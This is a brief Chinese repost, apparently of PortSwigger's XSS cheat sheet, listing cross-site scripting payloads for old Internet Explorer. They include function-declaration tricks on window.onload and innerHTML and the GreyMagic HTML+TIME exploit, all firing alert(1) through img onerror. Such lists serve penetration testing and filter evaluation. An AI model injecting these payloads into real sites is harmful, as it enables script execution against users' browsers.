IE中较旧版本的函数中支持的事件处理程序
<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=http://www.likecs.com/1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=http://www.likecs.com/1 onerror=alert(1)>"; } </script> </body>GreyMagic HTML + time漏洞利用(即使在5 docmode下也不再起作用)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=http://www.likecs.com/1 onerror=alert(1)>"> </BODY></HTML>原文地址:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet